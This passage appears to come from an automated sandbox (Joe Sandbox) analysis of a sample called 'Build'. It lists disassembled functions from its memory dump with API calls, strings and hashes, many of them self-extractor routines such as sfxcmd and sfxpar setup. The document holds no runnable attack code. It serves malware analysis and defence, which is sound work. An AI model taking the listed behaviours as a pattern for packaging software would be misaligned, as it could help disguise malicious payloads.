.inf, xrefs: 0093FC34

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 9b3085f76b4ffb71bfa3011db65f28381a1d4915e0e0cf0998f07a407a2481b2
Instruction ID: 05a0ec92d19f86590d5229f28976609e8a6157ede597ef6bd357780824db9183
Opcode Fuzzy Hash: 9b3085f76b4ffb71bfa3011db65f28381a1d4915e0e0cf0998f07a407a2481b2
Instruction Fuzzy Hash: F16103719083849EDB309F60D864ABBBBE9AF84744F04482EF8D497290D774DD88DF52

Function 0094CFAB Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00947F99,00947F99,?,?,?,0094D1FC,00000001,00000001,62E85006), ref: 0094D005
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0094D1FC,00000001,00000001,62E85006,?,?,?), ref: 0094D08B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0094D185
__freea.LIBCMT ref: 0094D192

Part of subcall function 0094BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0

__freea.LIBCMT ref: 0094D19B
__freea.LIBCMT ref: 0094D1C0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: be9d7e60666cee04f9ce98a8b5bf28c1cb2c2600e425350e2b890523f8c0739e
Instruction ID: c49edb0d7bc54c690acd8bbad99674b76bd0397c690c18fc0223b8c807de05ce
Opcode Fuzzy Hash: be9d7e60666cee04f9ce98a8b5bf28c1cb2c2600e425350e2b890523f8c0739e
Instruction Fuzzy Hash: 6251D176615216AFEB298F64CC81FBF77AAEB88710F144669FC15D7140EB34DC84C690

Function 0093CCD9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009328D4
Part of subcall function 009328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00931309,Crypt32.dll,00000000,00931383,00000200,?,00931366,00000000,00000000,?), ref: 009328F4

OleInitialize.OLE32(00000000), ref: 0093CCF2
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0093CD29
SHGetMalloc.SHELL32(0096C460), ref: 0093CD33

Strings

3To, xrefs: 0093CD0A
riched20.dll, xrefs: 0093CCE1

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: 5e6e9e146a323a4d2f815e03046d2d86f5a188e2de8ba19dc4db2a1d5c7ead88
Instruction ID: d103651a77deb41549a3a1090d77dadbdae255436eef8e8ff564916063083a43
Opcode Fuzzy Hash: 5e6e9e146a323a4d2f815e03046d2d86f5a188e2de8ba19dc4db2a1d5c7ead88
Instruction Fuzzy Hash: 99F0F9B1D04209ABCB10AF9AD8499EFFBFCEF94705F10405AF811A2251DBB496459BA1

Function 009312F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009328D4
Part of subcall function 009328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00931309,Crypt32.dll,00000000,00931383,00000200,?,00931366,00000000,00000000,?), ref: 009328F4

GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00931315
GetProcAddress.KERNEL32(0096C1F0,CryptUnprotectMemory), ref: 00931325

Strings

Crypt32.dll, xrefs: 009312FF
CryptProtectMemory, xrefs: 0093130F
CryptUnprotectMemory, xrefs: 0093131B

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: f1a72ea76c1e31695efa791dfe18f65e57c07e09979c36541cd52035ebafff6c
Instruction ID: 1cde6e28cb7ff136a1e6f70458ca893eb8703b31bec6f304b75db96e997431a7
Opcode Fuzzy Hash: f1a72ea76c1e31695efa791dfe18f65e57c07e09979c36541cd52035ebafff6c
Instruction Fuzzy Hash: C8E08C70A657019ED760AF3A9D09B427EF89F69706F848C1DE4CA936D0DAB4E8848F10

Function 0092B2B0 Relevance: 7.6, APIs: 5, Instructions: 119
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00928846,?,00000005), ref: 0092B342
GetLastError.KERNEL32(?,?,00928846,?,00000005), ref: 0092B34F
CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00928846,?,00000005), ref: 0092B382
GetLastError.KERNEL32(?,?,00928846,?,00000005), ref: 0092B38A
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00928846,?,00000005), ref: 0092B3D9

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 75a24e729e5f9f3031de07af43ea52b81c4fb9be03c599124176b5192adfdf62
Instruction ID: 9ea6a7c44e6e3f3a346929e76545dec605b2f989379dc0684b418c518160d31d
Opcode Fuzzy Hash: 75a24e729e5f9f3031de07af43ea52b81c4fb9be03c599124176b5192adfdf62
Instruction Fuzzy Hash: 8541253054A755AFD320DF35EC45BAABBD8BB44320F100B19F9A1972D1D7B1A948CB91

Function 0093D864 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0093D875
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D886
IsDialogMessageW.USER32(00010458,?), ref: 0093D89A
TranslateMessage.USER32(?), ref: 0093D8A8
DispatchMessageW.USER32(?), ref: 0093D8B2

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 14500b33536af663696c2f8ddbe091344a8ff6367a0730a60ddb855f747581f8
Instruction ID: c51794176906bc3d48304278bc5371890efbaeca04156c1fce68783096f00f59
Opcode Fuzzy Hash: 14500b33536af663696c2f8ddbe091344a8ff6367a0730a60ddb855f747581f8
Instruction Fuzzy Hash: 83F0307291A219ABDB20AFF5EC4CDEBBFBCEE052517004414F516D2150E724E505DBB0

Function 0093CB49 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0093CB6A
SHAutoComplete.SHLWAPI(?,00000010), ref: 0093CBA1

Part of subcall function 00934168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0092E084,00000000,.exe,?,?,00000800,?,?,?,0093AD5D), ref: 0093417E

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0093CB91

Strings

EDIT, xrefs: 0093CB75, 0093CB80, 0093CB8D

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 373ebc3a8a0e3527d82dc69d38c4404570ed8e93b36d5a6b50bfc4129bfcc8a2
Instruction ID: 12e43828b029194cad06ac1883e8cd25159c462aff65bb03822c5b5c43fb5afa
Opcode Fuzzy Hash: 373ebc3a8a0e3527d82dc69d38c4404570ed8e93b36d5a6b50bfc4129bfcc8a2
Instruction Fuzzy Hash: F6F0C871609714ABDB209B659C06FAFF7BC9F85B01F110055F901F7280D6B0EA05CBA5

Function 0093FFDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0093FFFE
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00940038

Strings

sfxpar, xrefs: 00940033
sfxcmd, xrefs: 0093FFF9

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 0a1cb0529a4dd372f1fb63327dbff190a16ecc93ba4a8708ba72abab5013574b
Instruction ID: d14ab1d5433fd59288f9a9e1b340eb6257d8ddf6a6e92da5a2092ef68f14748d
Opcode Fuzzy Hash: 0a1cb0529a4dd372f1fb63327dbff190a16ecc93ba4a8708ba72abab5013574b
Instruction Fuzzy Hash: 4AF02B71911334ABC720AF919C05EBF77DCDF8DB41B400019FE45A7181DAB49D80DBA1

Function 00946232 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,009461E3,00000000,00000001,009860C8,?,?,?,00946386,00000004,InitializeCriticalSectionEx,00959624,InitializeCriticalSectionEx), ref: 0094623F
GetLastError.KERNEL32(?,009461E3,00000000,00000001,009860C8,?,?,?,00946386,00000004,InitializeCriticalSectionEx,00959624,InitializeCriticalSectionEx,00000000,?,0094613D), ref: 00946249
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00945083), ref: 00946271

Strings

api-ms-, xrefs: 00946256

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 3f603b705ecbd9c8b18b2ee9aa0f4cd8dffae689f8096ab08f594d78e62021de
Instruction ID: 03687333ad89ce2fa81a8c24d99a095ed1d8c1963b47a50d7edf4f43c2f5ef99
Opcode Fuzzy Hash: 3f603b705ecbd9c8b18b2ee9aa0f4cd8dffae689f8096ab08f594d78e62021de
Instruction Fuzzy Hash: B8E04F70684308B7EF101F72EC06F5A3F68AB01B63F500020FA2DE84E0EBA59950A685

Function 0092B151 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B161
ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B179
GetLastError.KERNEL32(?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B1AB
GetLastError.KERNEL32(?,?,?,00000000,0092B662,?,?,00000000,?,?), ref: 0092B1CA

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: d53c774b50e29a0e1ecb767a8f0d434bd1ccd6f7a13dd6737d962097a8b1eeb1
Instruction ID: 44df32c9c1a881322e48342b0cceab291ce26a990c98f10c62a9255c97f88ff0
Opcode Fuzzy Hash: d53c774b50e29a0e1ecb767a8f0d434bd1ccd6f7a13dd6737d962097a8b1eeb1
Instruction Fuzzy Hash: A611C23051C224EBDB205F21EC2466A37EDFB41362F504929F826852D6D774DE64DB51

Function 0094D384 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0094688D,00000000,00000000,?,0094D32B,0094688D,00000000,00000000,00000000,?,0094D528,00000006,FlsSetValue), ref: 0094D3B6
GetLastError.KERNEL32(?,0094D32B,0094688D,00000000,00000000,00000000,?,0094D528,00000006,FlsSetValue,0095AC00,FlsSetValue,00000000,00000364,?,0094BA77), ref: 0094D3C2
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0094D32B,0094688D,00000000,00000000,00000000,?,0094D528,00000006,FlsSetValue,0095AC00,FlsSetValue,00000000), ref: 0094D3D0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a6ec537aed4d0c54e6280ce0a4b6718c904ec67506480e6b07e04accd93277e3
Instruction ID: 35c8f3618a4a75dd12991419a402316d5aca1e1797d6f77a90c08e111fd1521f
Opcode Fuzzy Hash: a6ec537aed4d0c54e6280ce0a4b6718c904ec67506480e6b07e04accd93277e3
Instruction Fuzzy Hash: CE01F73A326326ABCB214F7A9C44E57379CFF05BBAB110A24F916D7280DB24D80087E1

Function 0093136B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 009312F6: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00931315
Part of subcall function 009312F6: GetProcAddress.KERNEL32(0096C1F0,CryptUnprotectMemory), ref: 00931325

GetCurrentProcessId.KERNEL32(?,00000200,?,00931366), ref: 009313F9

Strings

CryptUnprotectMemory failed, xrefs: 009313F1
CryptProtectMemory failed, xrefs: 009313B0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 072df83a7d3d687f5e5ef8aa4c16623b24f593d425823b833246e62f8be35a38
Instruction ID: 8cb486e5ae2f0cd217459826a8e9b30549dbbe1141628ff000fdeb19fc7bfbf6
Opcode Fuzzy Hash: 072df83a7d3d687f5e5ef8aa4c16623b24f593d425823b833246e62f8be35a38
Instruction Fuzzy Hash: 5E113B316083256BDF15AF32DC0597E3B68EF41724F058126FC11AB2B2D674AD419FD0

Function 00933105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00933129
SetThreadPriority.KERNEL32(00000000,00000000), ref: 00933170

Part of subcall function 00927BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00927BD5

Strings

CreateThread failed, xrefs: 00933135

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 24067f3435ba465658d7b3d38eae0f4c544c08223bc8930b17e07294cd2691f3
Instruction ID: 12f1faa5abc0d59960501d680f7fe8adb7289e7502ad3e2aeeca4643f6dc54d6
Opcode Fuzzy Hash: 24067f3435ba465658d7b3d38eae0f4c544c08223bc8930b17e07294cd2691f3
Instruction Fuzzy Hash: FE01F9B138C7067FE3207FA1EC42F66B3A8EB81712F10012DF685671C4CAB0A8458B64

Function 0092B9BA Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0092F306,00000001,?,?,?,00000000,00937564,?,?,?,?), ref: 0092B9DE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0092BA25
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0092F306,00000001,?,?,?), ref: 0092BA51

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: b65beed991f1eea42b01505082ead9a6e03e6af881ad3440757cd488728109ec
Instruction ID: 2e2627c63837b085c8876f3deb0c71eb9bbf67cc94e2d21f4661422f392855a1
Opcode Fuzzy Hash: b65beed991f1eea42b01505082ead9a6e03e6af881ad3440757cd488728109ec
Instruction Fuzzy Hash: E231C235208326AFDB14CF20E848B6B77E9FB80715F144A1DF58167294CB74AD88CBA2

Function 0092BEE1 Relevance: 4.6, APIs: 3, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0092E1EC: _wcslen.LIBCMT ref: 0092E1F2

CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,0092BBD0,?,00000001,00000000,?,?), ref: 0092BF12
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,0092BBD0,?,00000001,00000000,?,?), ref: 0092BF45
GetLastError.KERNEL32(?,?,?,00000000,0092BBD0,?,00000001,00000000,?,?), ref: 0092BF62

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
